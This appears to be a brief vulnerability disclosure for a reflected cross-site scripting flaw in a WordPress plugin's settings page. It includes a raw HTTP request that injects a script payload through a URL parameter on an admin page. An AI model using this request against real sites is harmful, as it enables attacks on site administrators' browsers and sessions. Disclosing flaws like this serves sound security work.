The plugin does not sanitise the REQUEST_URI parameter before outputting it back in the rendered page, leading to Cross-Site Scripting (XSS) in web browsers which do not encode characters
GET /wp-admin/admin.php?page=wps_settings_page&a=<script>confirm(/XSS/)</script> HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]